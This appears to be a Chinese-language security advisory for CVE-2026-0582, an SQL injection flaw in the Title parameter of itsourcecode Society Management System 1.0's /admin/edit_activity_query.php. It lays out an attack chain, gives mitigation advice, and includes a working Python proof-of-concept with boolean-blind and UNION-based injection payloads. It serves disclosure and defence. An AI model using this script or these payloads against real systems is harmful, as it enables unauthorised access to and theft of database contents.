CVE-2026-0582: itsourcecode Society Management System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-0582

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Society Management System 1.0

漏洞概述

CVE-2026-0582是itsourcecode Society Management System 1.0版本中的一个中等严重性SQL注入漏洞。该漏洞存在于管理后台的/admin/edit_activity_query.php文件中，攻击者可以通过操纵Title参数实现SQL注入攻击。由于该漏洞的攻击复杂度较低且不需要用户交互，具有低权限的攻击者即可远程利用此漏洞。漏洞影响系统的机密性、完整性和可用性，可能导致敏感数据泄露、数据库被篡改或服务中断。公开已有利用代码，攻击者可以轻松获取利用方式。该系统是一款社团管理系统，被广泛应用于教育机构和企业内部管理，一旦被攻击可能导致大量用户信息和社团活动数据泄露。建议管理员尽快采取修复措施，防止漏洞被恶意利用。

技术细节

该SQL注入漏洞存在于itsourcecode Society Management System 1.0的后台管理文件/admin/edit_activity_query.php中。漏洞源于应用程序对用户输入的Title参数未进行充分的输入验证和SQL语句参数化处理。攻击者可以通过在Title参数中注入恶意的SQL代码片段，如单引号、UNION SELECT等SQL语句，利用SQL注入漏洞获取数据库中的敏感信息。攻击者首先需要拥有系统的低权限账户（如普通管理员账户），即可通过HTTP请求向受影响端点发送恶意构造的参数值。漏洞的CVSS向量显示攻击向量为网络级别（AV:N），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N）。由于系统未对用户输入进行严格的过滤和参数化查询，注入的恶意SQL代码将被数据库服务器执行，从而实现未授权的数据访问、修改或删除操作。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为itsourcecode Society Management System 1.0，确认管理后台/admin路径可访问

STEP 2

步骤2: 获取低权限账户

攻击者通过默认凭证、暴力破解或社会工程学获取系统的普通管理员账户（低权限即可）

STEP 3

步骤3: 构造恶意请求

攻击者登录管理后台，访问/admin/edit_activity_query.php页面，在Title参数中注入恶意SQL代码

STEP 4

步骤4: 执行SQL注入攻击

发送带有SQL注入payload的HTTP POST请求，payload被拼接入SQL查询语句并被数据库执行

STEP 5

步骤5: 数据窃取或破坏

根据注入的SQL语句，攻击者获取数据库中的敏感信息（用户数据、密码哈希等）或修改、删除数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-0582 SQL Injection PoC
# Target: itsourcecode Society Management System 1.0
# Endpoint: /admin/edit_activity_query.php
# Parameter: Title

def exploit_sqli(target_url, title_payload):
    """
    Exploit SQL injection vulnerability in edit_activity_query.php
    Args:
        target_url: Base URL of the vulnerable application
        title_payload: Malicious SQL payload to inject
    Returns:
        Response from the server
    """
    endpoint = f"{target_url}/admin/edit_activity_query.php"
    
    # Prepare the data payload with SQL injection
    data = {
        'Title': title_payload,
        'submit': 'Update'
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

def basic_blind_sqli(target_url):
    """
    Basic blind SQL injection test to verify vulnerability
    """
    # True condition - should return normal response
    true_payload = "test' AND 1=1 -- -"
    # False condition - should behave differently if vulnerable
    false_payload = "test' AND 1=2 -- -"
    
    print(f"[*] Testing with payload: {true_payload}")
    resp_true = exploit_sqli(target_url, true_payload)
    
    print(f"[*] Testing with payload: {false_payload}")
    resp_false = exploit_sqli(target_url, false_payload)
    
    if resp_true != resp_false:
        print("[+] Vulnerability confirmed! SQL injection is possible.")
    else:
        print("[-] Vulnerability not detected or target not vulnerable.")

def union_based_sqli(target_url):
    """
    Union-based SQL injection to extract database information
    """
    # Determine number of columns (adjust column count as needed)
    for i in range(1, 10):
        payload = f"test' UNION SELECT {'NULL,' * (i-1)} NULL -- -"
        print(f"[*] Testing {i} columns with: {payload}")
        resp = exploit_sqli(target_url, payload)
        if 'error' not in resp.lower() and 'warning' not in resp.lower():
            print(f"[+] Found {i} columns")
            # Extract database version
            version_payload = f"test' UNION SELECT NULL,@@version-- -"
            print(f"[*] Extracting database version...")
            exploit_sqli(target_url, version_payload)
            break

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2026_0582_poc.py <target_url>")
        print("Example: python cve_2026_0582_poc.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print("=" * 50)
    print("CVE-2026-0582 SQL Injection PoC")
    print("Target: itsourcecode Society Management System 1.0")
    print("=" * 50)
    
    basic_blind_sqli(target)
    union_based_sqli(target)

影响范围

itsourcecode Society Management System 1.0

防御指南

临时缓解措施

立即限制对/admin/edit_activity_query.php的直接访问，使用WAF（Web应用防火墙）规则暂时拦截包含SQL注入特征的请求（如单引号、UNION、SELECT等关键字）。同时对管理后台实施IP白名单访问控制，限制只有可信IP地址才能访问后台功能。在应用层代码修复前，考虑暂时关闭活动编辑功能，待官方发布安全补丁后再恢复使用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0582
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0582
3 Details https://www.cvedetails.com/cve/CVE-2026-0582/
4 VulDB https://vuldb.com/cve/CVE-2026-0582
5 Link https://github.com/xiaotsai/tttt/issues/2
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.339474
8 Link https://vuldb.com/?id.339474
9 Link https://vuldb.com/?submit.731207